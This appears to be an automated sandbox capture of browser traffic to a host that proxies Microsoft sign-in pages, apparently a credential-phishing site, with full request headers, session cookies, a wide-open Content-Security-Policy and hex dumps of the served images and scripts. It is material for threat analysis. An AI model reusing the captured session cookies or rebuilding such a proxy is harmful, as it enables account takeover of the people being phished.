                                                        2025-03-17 16:42:52 UTC5517INData Raw: ad 5b 7d 77 da c6 d2 ff ff 7e 0a a1 db 43 a4 9b b5 6c da a4 ed c5 55 7d 1c 5e 12 5a 3b 76 0d ee 5b 92 c3 11 68 01 c5 42 52 b5 c2 98 1a be fb f3 9b 5d 09 09 10 d8 e9 73 73 1c 83 76 67 67 67 67 e7 7d e4 e3 ff 54 fe a5 fd 47 3b 7a fe 3f ad db 3b bf e9 69 57 6d ad f7 ae 73 d3 d4 ae f1 f4 87 f6 fe aa d7 69 b4 9e 8f 87 36 a5 ff bd 89 27 b4 91 e7 73 0d 9f 03 47 70 57 0b 03 2d 8c 35 2f 18 86 71 14 c6 4e c2 85 36 c5 ef d8 73 7c 6d 14 87 53 2d 99 70 2d 8a c3 cf 7c 98 08 cd f7 44 82 45 03 ee 87 73 cd 00 ba d8 d5 ae 9d 38 59 68 9d 6b d3 02 7e 0e 6c de d8 0b b0 7a 18 46 0b 7c 9f 24 5a 10 26 de 90 6b 4e e0 4a 6c 3e 1e 02 c1 b5 59 e0 f2 58 9b 4f bc e1 44 bb f4 86 71 28 c2 51 a2 c5 7c c8 bd 7b 6c 22 66 18 df dc 82 69 4e cc 35 c1 13 6d 14 c6 c9 44 d1 61 69 5d 82 4c b1 0a
                                                        Data Ascii: [}w~ClU}^Z;v[hBR]ssvgggg}TG;z?;iWmsi6'sGpW-5/qN6s|mS-p-|DEs8Yhk~lzF|$Z&kNJl>YXODq(Q|{l"fiN5mDai]L


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.44978323.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:52 UTC3313OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:52 UTC735INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:52 GMT
                                                        Content-Type: image/gif
                                                        Content-Length: 2672
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Last-Modified: Fri, 17 Jan 2020 19:28:37 GMT
                                                        ETag: 0x8D79B83739984DD
                                                        x-ms-request-id: b067beb7-b01e-0033-805b-979cfd000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164252Z-186895dd8bd2r62ghC1EWRf0v000000005z000000000d19d
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_MISS
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:42:52 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                        Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.44978523.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:52 UTC3307OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:52 UTC735INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:52 GMT
                                                        Content-Type: image/gif
                                                        Content-Length: 3620
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                                        ETag: 0x8D79B8373B17F89
                                                        x-ms-request-id: 886a0625-801e-0038-7f5b-976796000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164252Z-r1769bfd58bzkgxlhC1YTOeymc000000030g000000008wnn
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_MISS
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:42:52 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                        Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.44978723.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:52 UTC3263OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:53 UTC1386INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:53 GMT
                                                        Content-Type: application/x-javascript
                                                        content-length: 109863
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Thu, 26 Jan 2023 00:32:54 GMT
                                                        ETag: 0x8DAFF34DD9DC630
                                                        x-ms-request-id: e408182c-f01e-0067-105b-97a415000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164253Z-r1769bfd58bq7x7qhC1YTO1vw400000002dg000000008c4g
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_MISS
                                                        Accept-Ranges: bytes
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-17 16:42:53 UTC14998INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6b 7b db c8 91 30 fa 7d 7f 05 c5 93 68 00 13 a4 48 ea 6a 92 10 d7 e3 f1 64 bd c7 63 fb b5 3d d9 37 af cc f8 81 c8 a6 84 31 04 30 b8 d8 56 44 ee 6f 3f 55 d5 77 a0 49 c9 1e 27 9b 73 4e 9e 8c 45 34 1a 7d a9 ae ae ae aa ae cb c1 a3 bd 7f 6b 3d 6a 75 1f fe bf d6 db 77 4f de bc 6b bd fa b9 f5 ee 3f 9e bf f9 a9 f5 1a 9e fe d2 7a f9 ea dd f3 a7 cf 1e de 0e 76 8a ff bd bb 8e 8b d6 32 4e 58 0b fe 5e 46 05 5b b4 b2 b4 95 e5 ad 38 9d 67 f9 2a cb a3 92 15 ad 1b f8 37 8f a3 a4 b5 cc b3 9b 56 79 cd 5a ab 3c fb 8d cd cb a2 95 c4 45 09 1f 5d b2 24 fb dc f2 a0 b9 7c d1 7a 1d e5 e5 6d eb f9 6b bf 07 ed 33 68 2d be 8a 53 f8 7a 9e ad 6e e1 f7 75 d9 4a b3 32 9e b3 56 94 2e a8 b5 04 1e d2 82 b5 aa 74 c1 f2 d6 e7 eb 78 7e dd fa 25 9e e7 59 91
                                                        Data Ascii: k{0}hHjdc=710VDo?UwI'sNE4}k=juwOk?zv2NX^F[8g*7VyZ<E]$|zmk3h-SznuJ2V.tx~%Y
                                                        2025-03-17 16:42:53 UTC1386INData Raw: ec f3 c8 d9 e7 d9 7a 78 d4 0f a8 77 d9 a9 7b 00 ca 16 4d 63 eb 5f 0c 4c cf 01 a3 b5 83 5d cd d6 d3 73 7a 32 c0 26 c8 e3 9b 29 ff e3 f9 e4 9e 2b 72 16 fc f5 7d d1 59 c3 7f 7f e0 69 0b 36 68 6a 2f 5f fe 44 99 1d ea 3e c1 22 b6 c1 58 6e 0e 32 31 06 09 af 13 b6 c3 b6 19 8a c7 74 f8 fb bb 3e 7d 8c 8b 6d 20 fc 48 83 3d 38 ff ce 43 1d e0 26 33 1c dc e9 ac 2c e9 84 24 af 02 6d 4b b1 f1 8d e4 b3 a9 07 6b ee 63 10 b7 c3 46 10 b7 b2 c7 13 2c fe 12 ad fe c4 83 02 66 3c ae fe 91 ef 78 13 18 d5 9f 66 69 81 a1 ab 29 9e da 99 df 7c a1 2a bf c4 ac a2 18 77 7b e0 1b 25 38 9e a3 2d a9 8c 71 00 c7 3c 68 db 71 5f 04 6d 3b 3e 39 f1 7b b4 ae 6f 59 09 84 06 bb 3d f5 7b d0 e1 0a 08 d8 8b b8 28 6b 61 bc 39 29 c7 a0 ce 44 e6 3f 50 4a dd 0c d3 fd 3e c9 31 50 46 1b 0b da 94 4d 41 56
                                                        Data Ascii: zxw{Mc_L]sz2&)+r}Yi6hj/_D>"Xn21t>}m H=8C&3,$mKkcF,f<xfi)|*w{%8-q<hq_m;>9{oY={(ka9)D?PJ>1PFMAV
                                                        2025-03-17 16:42:53 UTC9510INData Raw: 23 30 22 75 c1 a1 5b a0 67 5c a3 58 32 27 9a 62 c7 a1 cd 04 4a 6f 34 45 70 03 b3 9f b8 bb 44 67 b9 38 b0 3b 37 09 72 77 d0 9d 93 c7 5d ad 74 cb 27 62 b8 95 4f e1 cc ec 52 35 5a 41 ba 85 ae 58 30 9c 7a a4 44 c9 ad f6 53 1e c9 0b d9 b1 eb 4e c8 a4 8e e4 ba 86 5b 12 3a 6f 2d f6 c5 6d f2 c4 30 68 7d 23 11 e4 9e 9b 3f 92 16 d1 30 7e c9 4a 72 85 b5 29 df 30 5f 1a eb d9 6c 18 53 82 a5 60 c4 f4 88 e1 a4 79 f5 39 95 31 36 4c f7 9f da 08 80 a3 9a ba 59 be 74 46 4c b3 9b cc 37 3d 92 b8 1f ee 9d 10 a3 05 97 29 9e c4 3e 2e 6c de d3 d8 56 b4 50 23 73 d1 f4 3b b9 0b e5 c7 f5 6d ee f9 9b b1 01 46 c9 8c 23 77 85 a0 24 36 cb 28 53 7c 77 93 65 37 c5 fa c6 fb 2d 3c b6 f1 99 42 0b 5e d1 8d 33 ba 76 60 76 87 62 70 1d c2 5b b3 43 d5 28 26 75 c7 17 04 33 de 04 4e c5 54 84 4a a3
                                                        Data Ascii: #0"u[g\X2'bJo4EpDg8;7rw]t'bOR5ZAX0zDSN[:o-m0h}#?0~Jr)0_lS`y916LYtFL7=)>.lVP#s;mF#w$6(S|we7-<B^3v`vbp[C(&u3NTJ
                                                        2025-03-17 16:42:53 UTC6289INData Raw: cd 3d fb 73 db 36 d2 bf 7f 7f 85 cd 7a 1c 22 82 9f 79 34 21 c3 ea 1c 57 ed b4 13 c7 19 ab b9 cc 8d ac 78 68 99 b2 d9 c8 62 4a 52 76 12 4b f7 b7 df 3e 00 10 20 29 c5 c9 f5 66 be 1f 6c 52 20 9e 8b c5 02 fb c0 2e 05 2d d7 3f 0a ce 04 a9 97 98 f7 e2 02 bd 76 20 51 a7 df 80 eb 09 bf 8c c7 f4 64 d7 ed 4e 1e 4e 3a 98 4c 74 6a 41 c9 c9 75 5a d2 8b 62 c3 9c 32 2a ed 18 aa 77 d2 27 a6 8a a6 1a 75 30 c4 8e aa d8 64 91 cb 00 d7 48 ac 0a 8a a2 33 6b 9d a4 b9 b1 4f 56 31 db a3 db 8b a6 08 cb 43 4f cb f0 ed ea 22 cd ef d7 08 65 5d d2 c4 ec 3a 2e 3e b4 c8 c9 76 49 58 f9 55 a7 91 2b 02 7d d4 d7 fb 20 19 aa f5 1a e2 3b e6 6f f3 9f 87 2a a6 6c 02 67 2d f5 02 db 6e 3e 75 7f 99 e8 27 39 ee 85 4b e3 9d 3c 7f fc 37 45 45 82 dd 97 82 df 3c 7d fe e4 6b e1 3c ed 9d b9 4d 0b de a6
                                                        Data Ascii: =s6z"y4!WxhbJRvK> )flR .-?v QdNN:LtjAuZb2*w'u0dH3kOV1CO"e]:.>vIXU+} ;o*lg-n>u'9K<7EE<}k<M


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.44978623.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:52 UTC3307OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
